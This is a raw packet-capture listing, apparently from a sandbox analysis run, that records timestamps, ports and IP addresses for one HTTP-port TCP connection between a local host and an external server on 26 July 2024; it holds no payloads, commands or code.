Jul 26, 2024 18:56:41.679405928 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.679418087 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.679429054 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.679430008 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.679441929 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.679442883 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.679456949 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.679471970 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.679481030 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.679485083 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.679487944 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.679498911 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.679503918 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.679511070 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.679527044 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.679548025 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.680439949 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.680453062 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.680458069 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.680469036 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.680488110 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.680500984 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.680504084 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.680516005 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.680516005 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.680522919 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.680531025 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.680543900 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.680546999 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.680556059 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.680562019 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.680569887 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.680581093 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.680582047 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.680594921 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.680603981 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.680628061 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.681041002 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.681054115 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.681065083 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.681077957 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.681085110 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.681090117 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.681098938 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.681102991 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.681118965 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.681123018 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.681133032 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.681137085 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.681148052 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.681154966 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.681159973 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.681173086 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.681179047 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.681186914 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.681199074 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.681202888 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.681211948 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.681216955 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.681236029 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.681252003 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.681796074 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.681811094 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.681822062 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.681833982 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.681845903 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.681868076 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.681899071 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.681911945 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.681922913 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.681930065 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.681936026 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.681947947 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.681952953 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.681961060 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.681972027 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.681976080 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.681986094 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.681992054 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.681999922 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.682010889 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.682012081 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.682034016 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.682054043 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.682837009 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.682849884 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.682861090 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.682872057 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.682873011 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.682884932 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.682885885 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.682898998 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.682899952 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.682912111 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.682920933 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.682924032 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.682936907 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.682945013 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.682949066 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.682961941 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.682966948 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.682976007 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.682980061 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.682991982 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.683001041 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.683013916 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.683027029 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.711652040 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.711783886 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.711797953 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.711808920 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.711821079 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.711833000 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.711895943 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.711935043 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.712073088 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.712085009 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.712095976 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.712115049 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.712137938 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.712146997 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.712160110 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.712172031 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.712182999 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.712184906 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.712196112 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.712208033 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.712213039 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.712239981 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.712786913 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.712800026 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.712810040 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.712821960 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.712833881 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.712833881 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.712846041 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.712857008 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.712867022 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.712871075 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.712882042 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.712886095 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.712898970 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.712898970 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.712913036 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.712918043 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.712919950 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.712944984 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.712965965 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.833930969 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.837100029 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.837243080 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.837568998 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.837646961 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.837656021 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.837691069 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.837723017 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.837764978 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.837774992 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.837785006 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.837795019 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.837817907 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.837842941 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.837991953 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.838038921 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.838498116 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.838509083 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.838519096 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.838545084 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.838572025 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.838829994 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.838840961 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.838850021 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.838859081 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.838879108 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.838906050 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.838932037 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.838978052 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.838989019 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.838998079 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.839008093 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.839019060 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.839030027 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.839032888 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.839040041 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.839051008 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.839057922 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.839061975 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.839081049 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.839107037 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.839600086 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.839612007 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.839621067 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.839631081 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.839641094 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.839651108 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.839654922 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.839662075 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.839673996 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.839677095 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.839685917 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.839704990 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.839704990 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.839735031 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.840429068 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.840476990 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.840508938 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.840518951 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.840528011 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.840537071 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.840547085 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.840555906 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.840557098 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.840568066 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.840574980 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.840576887 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.840596914 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.840615988 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.841456890 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.841468096 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.841476917 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.841486931 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.841496944 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.841506958 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.841515064 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.841526031 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.841535091 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.841542006 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.841542006 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.841545105 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.841542006 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.841556072 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.841567039 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.841577053 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.841578007 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.841578007 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.841588974 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.841600895 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.841604948 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.841638088 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.842611074 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.842622995 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.842631102 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.842641115 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.842650890 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.842660904 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.842667103 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.842669964 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.842680931 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.842686892 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.842694044 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.842705011 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.842705965 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.842715025 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.842727900 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.842726946 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.842737913 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.842744112 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.842749119 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.842758894 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.842782974 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.842782974 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.842803955 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.843905926 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.843916893 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.843925953 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.843935966 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.843945980 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.843955994 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.843964100 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.843966961 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.843977928 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.843986988 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.843990088 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.844002008 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.844006062 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.844011068 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.844022036 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.844026089 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.844033003 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.844047070 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.844048977 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.844086885 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.844086885 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.844746113 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.844757080 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.844765902 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.844777107 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.844785929 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.844793081 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.844795942 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.844806910 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.844816923 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.844821930 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.844829082 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.844840050 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.844841003 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.844851017 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.844860077 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.844870090 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.844881058 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.844883919 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.844883919 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.844904900 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.844923973 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.845465899 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.845478058 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.845485926 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.845495939 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.845505953 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.845515013 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.845521927 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.845549107 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.845549107 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.899312973 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.899331093 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.899343014 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.899405956 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.899419069 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.899432898 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.899444103 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.899456978 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.899465084 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.899492979 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.899620056 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.899631977 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.899642944 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.899652958 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.899665117 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.899668932 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.899677992 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.899705887 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:41.899903059 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:41.899914026 CEST	80	49757	147.45.44.104	192.168.2.4
